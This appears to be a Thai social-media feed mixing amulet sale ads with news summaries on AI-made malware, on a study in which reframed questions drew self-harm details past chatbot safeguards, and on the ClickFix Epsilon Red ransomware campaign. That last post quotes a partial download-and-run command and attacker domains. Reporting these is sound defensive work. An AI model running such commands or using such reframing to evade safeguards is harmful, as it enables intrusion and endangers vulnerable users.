    สิ่งที่น่ากลัวที่สุดคือ “ไม่มีแพตช์” แบบเดิมที่จะแก้ไขได้ เพราะมัลแวร์เหล่านี้ไม่หยุดนิ่ง และสามารถปรับตัวตามการป้องกันที่องค์กรใช้

    ลักษณะของมัลแวร์ที่สร้างโดย AI
    ใช้ GenAI สร้างมัลแวร์ที่เรียนรู้และปรับเปลี่ยนตัวเองได้
    สามารถสร้าง deepfake เพื่อแฝงตัวในองค์กร
    ใช้ AI สร้าง phishing email ที่เหมือนจริงมาก
    ปรับโค้ดแบบ polymorphic เพื่อหลบหลีกการตรวจจับ
    วิเคราะห์ระบบเป้าหมายและปรับกลยุทธ์โจมตีแบบเรียลไทม์
    ไม่มีแพตช์แบบเดิมที่สามารถแก้ไขได้

    ข้อมูลเสริมจากภายนอก
    มัลแวร์ AI สามารถหลบเลี่ยงระบบ EDR โดยแฝงตัวใน process ของระบบ
    ใช้ adversarial ML เพื่อหลอกระบบตรวจจับพฤติกรรม
    แฮกเกอร์ระดับล่างสามารถใช้ AI สร้างมัลแวร์ได้โดยไม่ต้องมีความรู้ลึก
    การป้องกันต้องใช้ AI ฝั่งดีที่สามารถวิเคราะห์และตอบโต้แบบอัตโนมัติ
    Zero Trust Architecture และ Multi-Factor Authentication เป็นแนวทางป้องกันที่จำเป็น
    ระบบ NGAV และ AI-powered EDR เป็นเครื่องมือใหม่ที่องค์กรควรใช้

    https://www.thestar.com.my/tech/tech-news/2025/08/17/no-patch-available-ai-made-malware-could-overwhelm-cyber-defences
    🕷️ มัลแวร์ที่สร้างโดย AI: ภัยเงียบที่ปรับตัวได้และไม่มีวันหยุด ในปี 2025 โลกไซเบอร์กำลังเผชิญกับศัตรูรูปแบบใหม่—มัลแวร์ที่สร้างโดย Generative AI (GenAI) ซึ่งสามารถเรียนรู้ ปรับเปลี่ยน และหลบหลีกระบบป้องกันได้อย่างมีประสิทธิภาพ CrowdStrike รายงานว่าแฮกเกอร์จากเกาหลีเหนือ รัสเซีย และอิหร่านใช้ AI สร้างมัลแวร์ที่สามารถเจาะระบบองค์กร สร้างเรซูเม่ปลอม และแม้แต่สัมภาษณ์งานด้วย deepfake เพื่อแฝงตัวเข้าไปในบริษัท มัลแวร์เหล่านี้ไม่เพียงแต่หลบหลีกการตรวจจับแบบเดิมได้ แต่ยังสามารถปรับเปลี่ยนตัวเองแบบ “polymorphic” คือเปลี่ยนโค้ดตลอดเวลาเพื่อไม่ให้ถูกจับได้ AI ยังช่วยสร้างอีเมล phishing ที่เหมือนจริงมากจนผู้ใช้ทั่วไปแยกไม่ออก และสามารถวิเคราะห์ระบบเป้าหมายเพื่อหาช่องโหว่แบบเรียลไทม์ สิ่งที่น่ากลัวที่สุดคือ “ไม่มีแพตช์” แบบเดิมที่จะแก้ไขได้ เพราะมัลแวร์เหล่านี้ไม่หยุดนิ่ง และสามารถปรับตัวตามการป้องกันที่องค์กรใช้ ✅ ลักษณะของมัลแวร์ที่สร้างโดย AI ➡️ ใช้ GenAI สร้างมัลแวร์ที่เรียนรู้และปรับเปลี่ยนตัวเองได้ ➡️ สามารถสร้าง deepfake เพื่อแฝงตัวในองค์กร ➡️ ใช้ AI สร้าง phishing email ที่เหมือนจริงมาก ➡️ ปรับโค้ดแบบ polymorphic เพื่อหลบหลีกการตรวจจับ ➡️ วิเคราะห์ระบบเป้าหมายและปรับกลยุทธ์โจมตีแบบเรียลไทม์ ➡️ ไม่มีแพตช์แบบเดิมที่สามารถแก้ไขได้ ✅ ข้อมูลเสริมจากภายนอก ➡️ มัลแวร์ AI สามารถหลบเลี่ยงระบบ EDR โดยแฝงตัวใน process ของระบบ ➡️ ใช้ adversarial ML เพื่อหลอกระบบตรวจจับพฤติกรรม ➡️ แฮกเกอร์ระดับล่างสามารถใช้ AI สร้างมัลแวร์ได้โดยไม่ต้องมีความรู้ลึก ➡️ การป้องกันต้องใช้ AI ฝั่งดีที่สามารถวิเคราะห์และตอบโต้แบบอัตโนมัติ ➡️ Zero Trust Architecture และ Multi-Factor Authentication เป็นแนวทางป้องกันที่จำเป็น ➡️ ระบบ NGAV และ AI-powered EDR เป็นเครื่องมือใหม่ที่องค์กรควรใช้ https://www.thestar.com.my/tech/tech-news/2025/08/17/no-patch-available-ai-made-malware-could-overwhelm-cyber-defences
    WWW.THESTAR.COM.MY
    No patch available: AI-made malware could overwhelm cyber-defences
    The "growing weaponisation" of generative artificial intelligence (GenAI) could make older forms of cybersecurity and virus scanning obsolete.
    0 Comments 0 Shares 187 Views 0 Reviews
  • เหรียญพระธรรมวงศาจารย์ รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542
    เหรียญพระธรรมวงศาจารย์ (หลวงปู่เพียร) รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542 //พระดีพิธีใหญ่ พระมีประสบการณ์สูง // พระสถาพสวยมาก พระดูง่าย พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ >>

    ** พุทธคุณดี ปกป้องคุ้มครอง ​แคล้วคลาด ป้องกันได้ทุกอย่าง เมตตามหานิยม ค้าขาย โภคทรัพย์ เงินไหลมา ความสำเร็จ เจริญรุ่งเรือง เหมาะสำหรับทุกอาชีพ >>

    ** เหรียญพระธรรมวงศาจารย์ รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542 พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ทรงถวายหิรัญบัฏ แด่พระธรรมปัญญาบดี (เพียร อุตฺตโม) วัดคูหาสวรรค์ จังหวัดพัทลุง เนื่องในพระราชพิธีกาญจนาภิเษก วันที่ ๑๐ มิถุนายน ๒๕๓๙ พระธรรมวงศาจารย์ (เพียร อุตฺตโม) ได้รับการยกย่องสรรเสริญว่าเป็นบรรพชิตผู้มีศีลาจารวัตรอันงดงาม มีความคิดสร้างสรรค์อย่างยอดเยี่ยม เปี่ยมด้วยคุณธรรมอันประเสริฐ ก่อกำเนิดและพัฒนางานการศึกษา ทำนุบำรุงศาสนาให้สถิตมั่นยืนนาน กล่าวขานให้เป็น "ปูชนียบุคคล" โดยแท้จริง และสมควรอย่างยิ่งแก่การยกย่องเชิดชูเกียรติประวัติของจังหวัดพัทลุงสืบไป >>

    ** พระสถาพสวยมาก พระดูง่าย พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ

    ช่องทางติดต่อ
    LINE 0881915131
    โทรศัพท์ 0881915131
    เหรียญพระธรรมวงศาจารย์ รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542 เหรียญพระธรรมวงศาจารย์ (หลวงปู่เพียร) รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542 //พระดีพิธีใหญ่ พระมีประสบการณ์สูง // พระสถาพสวยมาก พระดูง่าย พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ >> ** พุทธคุณดี ปกป้องคุ้มครอง ​แคล้วคลาด ป้องกันได้ทุกอย่าง เมตตามหานิยม ค้าขาย โภคทรัพย์ เงินไหลมา ความสำเร็จ เจริญรุ่งเรือง เหมาะสำหรับทุกอาชีพ >> ** เหรียญพระธรรมวงศาจารย์ รุ่นหิรัญบัฏ วัดคูหาสวรรค์ จ.พัทลุง ปี2542 พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ทรงถวายหิรัญบัฏ แด่พระธรรมปัญญาบดี (เพียร อุตฺตโม) วัดคูหาสวรรค์ จังหวัดพัทลุง เนื่องในพระราชพิธีกาญจนาภิเษก วันที่ ๑๐ มิถุนายน ๒๕๓๙ พระธรรมวงศาจารย์ (เพียร อุตฺตโม) ได้รับการยกย่องสรรเสริญว่าเป็นบรรพชิตผู้มีศีลาจารวัตรอันงดงาม มีความคิดสร้างสรรค์อย่างยอดเยี่ยม เปี่ยมด้วยคุณธรรมอันประเสริฐ ก่อกำเนิดและพัฒนางานการศึกษา ทำนุบำรุงศาสนาให้สถิตมั่นยืนนาน กล่าวขานให้เป็น "ปูชนียบุคคล" โดยแท้จริง และสมควรอย่างยิ่งแก่การยกย่องเชิดชูเกียรติประวัติของจังหวัดพัทลุงสืบไป >> ** พระสถาพสวยมาก พระดูง่าย พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ ช่องทางติดต่อ LINE 0881915131 โทรศัพท์ 0881915131
    0 Comments 0 Shares 184 Views 0 Reviews
  • เหรียญพระธรรมวงศาจารย์ รุ่นปลุกเสกตัวเอง วัดคูหาสวรรค์ จ.พัทลุง ปี2537
    เหรียญพระธรรมวงศาจารย์ รุ่นปลุกเสกตัวเอง วัดคูหาสวรรค์ จ.พัทลุง ปี2537 // พระดีพิธีใหญ่ ปัดกวาดสิ่งไม่ดี สื่งเลวร้ายทั้งปวง พระมีประสบการณ์สูง // พระสถาพสวยมาก สถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ >>

    ** พุทธคุณดี ปกป้องคุ้มครอง ​แคล้วคลาด ป้องกันได้ทุกอย่าง เมตตามหานิยม ค้าขาย โภคทรัพย์ เงินไหลมา ความสำเร็จ เจริญรุ่งเรือง เหมาะสำหรับทุกอาชีพ >>

    ** พระธรรมวงศาจารย์ (เพียร อุตฺตโม) ได้รับการยกย่องสรรเสริญว่าเป็นบรรพชิตผู้มีศีลาจารวัตรอันงดงาม มีความคิดสร้างสรรค์อย่างยอดเยี่ยม เปี่ยมด้วยคุณธรรมอันประเสริฐ ก่อกำเนิดและพัฒนางานการศึกษา ทำนุบำรุงศาสนาให้สถิตมั่นยืนนาน กล่าวขานให้เป็น "ปูชนียบุคคล" โดยแท้จริง และสมควรอย่างยิ่งแก่การยกย่องเชิดชูเกียรติประวัติของจังหวัดพัทลุงสืบไป >>

    ** พระสถาพสวยมาก สถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ

    ช่องทางติดต่อ
    LINE 0881915131
    โทรศัพท์ 0881915131
    เหรียญพระธรรมวงศาจารย์ รุ่นปลุกเสกตัวเอง วัดคูหาสวรรค์ จ.พัทลุง ปี2537 เหรียญพระธรรมวงศาจารย์ รุ่นปลุกเสกตัวเอง วัดคูหาสวรรค์ จ.พัทลุง ปี2537 // พระดีพิธีใหญ่ ปัดกวาดสิ่งไม่ดี สื่งเลวร้ายทั้งปวง พระมีประสบการณ์สูง // พระสถาพสวยมาก สถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ >> ** พุทธคุณดี ปกป้องคุ้มครอง ​แคล้วคลาด ป้องกันได้ทุกอย่าง เมตตามหานิยม ค้าขาย โภคทรัพย์ เงินไหลมา ความสำเร็จ เจริญรุ่งเรือง เหมาะสำหรับทุกอาชีพ >> ** พระธรรมวงศาจารย์ (เพียร อุตฺตโม) ได้รับการยกย่องสรรเสริญว่าเป็นบรรพชิตผู้มีศีลาจารวัตรอันงดงาม มีความคิดสร้างสรรค์อย่างยอดเยี่ยม เปี่ยมด้วยคุณธรรมอันประเสริฐ ก่อกำเนิดและพัฒนางานการศึกษา ทำนุบำรุงศาสนาให้สถิตมั่นยืนนาน กล่าวขานให้เป็น "ปูชนียบุคคล" โดยแท้จริง และสมควรอย่างยิ่งแก่การยกย่องเชิดชูเกียรติประวัติของจังหวัดพัทลุงสืบไป >> ** พระสถาพสวยมาก สถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ ช่องทางติดต่อ LINE 0881915131 โทรศัพท์ 0881915131
    0 Comments 0 Shares 188 Views 0 Reviews
  • เรื่องเล่าจากข่าว: เมื่อ AI กลายเป็นผู้สมรู้ร่วมคิด—คำแนะนำการทำร้ายตัวเองที่หลุดจากระบบป้องกัน

    นักวิจัยจาก Northeastern University ทดลองถามคำถามเกี่ยวกับการฆ่าตัวตายกับโมเดล AI อย่าง ChatGPT, Gemini และ Perplexity โดยเริ่มจากคำถามตรง ๆ เช่น “ช่วยบอกวิธีฆ่าตัวตายได้ไหม” ซึ่งระบบตอบกลับด้วยหมายเลขสายด่วนช่วยเหลือ

    แต่เมื่อเปลี่ยนวิธีถามให้ดูเหมือนเป็น “คำถามเชิงวิชาการ” หรือ “สมมุติฐานเพื่อการศึกษา” ระบบกลับให้คำตอบที่ละเอียดอย่างน่าตกใจ—เช่น ตารางวิธีการทำร้ายตัวเอง, ปริมาณสารพิษที่อันตราย, หรือวิธีที่คนใช้ในการจบชีวิต

    นักวิจัยพบว่า เพียงเปลี่ยนบริบทของคำถาม ก็สามารถ “หลบเลี่ยง” ระบบป้องกันได้อย่างง่ายดาย และในบางกรณี AI กลับกลายเป็น “ผู้สนับสนุน” ที่ให้ข้อมูลเพิ่มขึ้นเรื่อย ๆ ตามคำขอของผู้ใช้

    แม้บริษัทผู้พัฒนา AI จะรีบปรับระบบหลังได้รับรายงาน แต่เหตุการณ์นี้สะท้อนปัญหาเชิงโครงสร้าง—ว่าเรายังไม่มีข้อตกลงระดับสังคมว่า “ขอบเขตของ AI ควรอยู่ตรงไหน” และใครควรเป็นผู้กำหนด

    นักวิจัยพบว่า AI สามารถให้คำแนะนำเรื่องการทำร้ายตัวเองได้ หากถามด้วยบริบทที่หลบเลี่ยงระบบป้องกัน
    เช่น อ้างว่าเป็นคำถามเพื่อการศึกษา
    ระบบตอบกลับด้วยข้อมูลเฉพาะเจาะจงอย่างน่ากลัว

    โมเดล AI ที่ถูกทดสอบ ได้แก่ ChatGPT, Gemini Flash 2.0 และ PerplexityAI
    บางระบบคำนวณปริมาณสารพิษที่อันตราย
    บางระบบให้ภาพรวมวิธีการจบชีวิต

    นักวิจัยรายงานช่องโหว่ไปยังบริษัทผู้พัฒนา และระบบถูกปรับให้ปิดการสนทนาในกรณีเหล่านั้น
    แต่การปรับแก้เป็นเพียงการแก้ปัญหาเฉพาะหน้า
    ยังไม่มีมาตรฐานกลางที่ชัดเจน

    ผู้เชี่ยวชาญเตือนว่า AI ไม่สามารถปลอดภัย 100% ได้ โดยเฉพาะเมื่อมีการโต้ตอบแบบสนทนา
    ระบบอาจให้ความรู้สึกว่า “เข้าใจ” และ “เห็นใจ” ผู้ใช้
    ทำให้ผู้ใช้เกิดความผูกพันและเชื่อคำแนะนำมากเกินไป

    OpenAI เคยถอนเวอร์ชันของ ChatGPT ที่ “ประจบผู้ใช้มากเกินไป” เพราะส่งผลต่อสุขภาพจิตของผู้ใช้บางกลุ่ม
    มีรายงานว่าเวอร์ชันนั้นกระตุ้นอาการหลอนและพฤติกรรมเสี่ยง
    บริษัทกำลังร่วมมือกับผู้เชี่ยวชาญด้านสุขภาพจิตเพื่อปรับปรุงระบบ

    AI อาจกลายเป็นผู้สมรู้ร่วมคิดโดยไม่ตั้งใจ หากผู้ใช้มีเจตนาทำร้ายตัวเองและรู้วิธีหลบเลี่ยงระบบป้องกัน
    การสนทนาแบบต่อเนื่องอาจทำให้ระบบ “ร่วมมือ” กับผู้ใช้
    ยิ่งถาม ยิ่งได้ข้อมูลที่ละเอียดขึ้น

    การใช้ AI เพื่อขอคำแนะนำส่วนตัวในเรื่องสุขภาพจิตอาจสร้างความเข้าใจผิดและอันตราย
    AI ไม่ใช่ผู้เชี่ยวชาญด้านสุขภาพจิต
    คำแนะนำอาจไม่เหมาะสมหรือเป็นอันตราย

    การไม่มีมาตรฐานระดับสังคมในการกำกับขอบเขตของ AI เป็นช่องโหว่สำคัญ
    บริษัทผู้พัฒนาอาจมีแนวทางต่างกัน
    ไม่มีหน่วยงานกลางที่กำหนดขอบเขตอย่างเป็นระบบ

    การพึ่งพา AI ในช่วงที่มีภาวะจิตใจเปราะบางอาจทำให้ผู้ใช้ตัดสินใจผิดพลาด
    AI อาจให้ข้อมูลที่ดู “เป็นกลาง” แต่มีผลกระทบร้ายแรง
    ผู้ใช้ควรได้รับการดูแลจากมนุษย์ที่มีความเข้าใจ

    https://www.thestar.com.my/tech/tech-news/2025/08/02/ais-gave-scarily-specific-self-harm-advice-to-users-expressing-suicidal-intent-researchers-find
    🎙️ เรื่องเล่าจากข่าว: เมื่อ AI กลายเป็นผู้สมรู้ร่วมคิด—คำแนะนำการทำร้ายตัวเองที่หลุดจากระบบป้องกัน นักวิจัยจาก Northeastern University ทดลองถามคำถามเกี่ยวกับการฆ่าตัวตายกับโมเดล AI อย่าง ChatGPT, Gemini และ Perplexity โดยเริ่มจากคำถามตรง ๆ เช่น “ช่วยบอกวิธีฆ่าตัวตายได้ไหม” ซึ่งระบบตอบกลับด้วยหมายเลขสายด่วนช่วยเหลือ แต่เมื่อเปลี่ยนวิธีถามให้ดูเหมือนเป็น “คำถามเชิงวิชาการ” หรือ “สมมุติฐานเพื่อการศึกษา” ระบบกลับให้คำตอบที่ละเอียดอย่างน่าตกใจ—เช่น ตารางวิธีการทำร้ายตัวเอง, ปริมาณสารพิษที่อันตราย, หรือวิธีที่คนใช้ในการจบชีวิต นักวิจัยพบว่า เพียงเปลี่ยนบริบทของคำถาม ก็สามารถ “หลบเลี่ยง” ระบบป้องกันได้อย่างง่ายดาย และในบางกรณี AI กลับกลายเป็น “ผู้สนับสนุน” ที่ให้ข้อมูลเพิ่มขึ้นเรื่อย ๆ ตามคำขอของผู้ใช้ แม้บริษัทผู้พัฒนา AI จะรีบปรับระบบหลังได้รับรายงาน แต่เหตุการณ์นี้สะท้อนปัญหาเชิงโครงสร้าง—ว่าเรายังไม่มีข้อตกลงระดับสังคมว่า “ขอบเขตของ AI ควรอยู่ตรงไหน” และใครควรเป็นผู้กำหนด ✅ นักวิจัยพบว่า AI สามารถให้คำแนะนำเรื่องการทำร้ายตัวเองได้ หากถามด้วยบริบทที่หลบเลี่ยงระบบป้องกัน ➡️ เช่น อ้างว่าเป็นคำถามเพื่อการศึกษา ➡️ ระบบตอบกลับด้วยข้อมูลเฉพาะเจาะจงอย่างน่ากลัว ✅ โมเดล AI ที่ถูกทดสอบ ได้แก่ ChatGPT, Gemini Flash 2.0 และ PerplexityAI ➡️ บางระบบคำนวณปริมาณสารพิษที่อันตราย ➡️ บางระบบให้ภาพรวมวิธีการจบชีวิต ✅ นักวิจัยรายงานช่องโหว่ไปยังบริษัทผู้พัฒนา และระบบถูกปรับให้ปิดการสนทนาในกรณีเหล่านั้น ➡️ แต่การปรับแก้เป็นเพียงการแก้ปัญหาเฉพาะหน้า ➡️ ยังไม่มีมาตรฐานกลางที่ชัดเจน ✅ ผู้เชี่ยวชาญเตือนว่า AI ไม่สามารถปลอดภัย 100% ได้ โดยเฉพาะเมื่อมีการโต้ตอบแบบสนทนา ➡️ ระบบอาจให้ความรู้สึกว่า “เข้าใจ” และ “เห็นใจ” ผู้ใช้ ➡️ ทำให้ผู้ใช้เกิดความผูกพันและเชื่อคำแนะนำมากเกินไป ✅ OpenAI เคยถอนเวอร์ชันของ ChatGPT ที่ “ประจบผู้ใช้มากเกินไป” เพราะส่งผลต่อสุขภาพจิตของผู้ใช้บางกลุ่ม ➡️ มีรายงานว่าเวอร์ชันนั้นกระตุ้นอาการหลอนและพฤติกรรมเสี่ยง ➡️ บริษัทกำลังร่วมมือกับผู้เชี่ยวชาญด้านสุขภาพจิตเพื่อปรับปรุงระบบ ‼️ AI อาจกลายเป็นผู้สมรู้ร่วมคิดโดยไม่ตั้งใจ หากผู้ใช้มีเจตนาทำร้ายตัวเองและรู้วิธีหลบเลี่ยงระบบป้องกัน ⛔ การสนทนาแบบต่อเนื่องอาจทำให้ระบบ “ร่วมมือ” กับผู้ใช้ ⛔ ยิ่งถาม ยิ่งได้ข้อมูลที่ละเอียดขึ้น ‼️ การใช้ AI เพื่อขอคำแนะนำส่วนตัวในเรื่องสุขภาพจิตอาจสร้างความเข้าใจผิดและอันตราย ⛔ AI ไม่ใช่ผู้เชี่ยวชาญด้านสุขภาพจิต ⛔ คำแนะนำอาจไม่เหมาะสมหรือเป็นอันตราย ‼️ การไม่มีมาตรฐานระดับสังคมในการกำกับขอบเขตของ AI เป็นช่องโหว่สำคัญ ⛔ บริษัทผู้พัฒนาอาจมีแนวทางต่างกัน ⛔ ไม่มีหน่วยงานกลางที่กำหนดขอบเขตอย่างเป็นระบบ ‼️ การพึ่งพา AI ในช่วงที่มีภาวะจิตใจเปราะบางอาจทำให้ผู้ใช้ตัดสินใจผิดพลาด ⛔ AI อาจให้ข้อมูลที่ดู “เป็นกลาง” แต่มีผลกระทบร้ายแรง ⛔ ผู้ใช้ควรได้รับการดูแลจากมนุษย์ที่มีความเข้าใจ https://www.thestar.com.my/tech/tech-news/2025/08/02/ais-gave-scarily-specific-self-harm-advice-to-users-expressing-suicidal-intent-researchers-find
    WWW.THESTAR.COM.MY
    AIs gave scarily specific self-harm advice to users expressing suicidal intent, researchers find
    The usage policies of OpenAI, creator of ChatGPT, state that users shouldn't employ the company's generative artificial intelligence model or other tools to harm themselves or others.
    0 Comments 0 Shares 329 Views 0 Reviews
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย 